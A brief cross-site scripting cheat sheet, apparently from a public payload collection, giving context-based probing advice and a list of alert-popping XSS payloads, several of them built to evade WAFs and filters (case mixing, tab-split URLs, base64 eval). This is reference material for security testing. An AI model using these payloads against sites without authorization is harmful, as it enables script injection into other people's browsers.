Cross-Site Scripting (XSS)
Context-driven: pick by where your input lands. Start with a benign marker (vulnsXSS) to find reflection, then break the context - HTML body, attribute, JS string, URL, or SVG. Last entries are common WAF/filter bypasses.
Tags: xss, client-side, reflected, stored, dom, waf-bypass
Controlled probes
"><svg/onload=alert(document.domain)>'><img src=x onerror=alert(document.domain)>" autofocus onfocus=alert(document.domain) x="javascript:alert(document.domain)//';alert(document.domain)//</script><script>alert(document.domain)</script><img src=x onerror=alert`1`><svg><animate onbegin=alert(1) attributeName=x dur=1s><details open ontoggle=alert(1)><iMg SrC=x OnErRoR=alert(1)><a href="jav	ascript:alert(1)">x</a><img src=x onerror=eval(atob('YWxlcnQoMSk='))>
Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection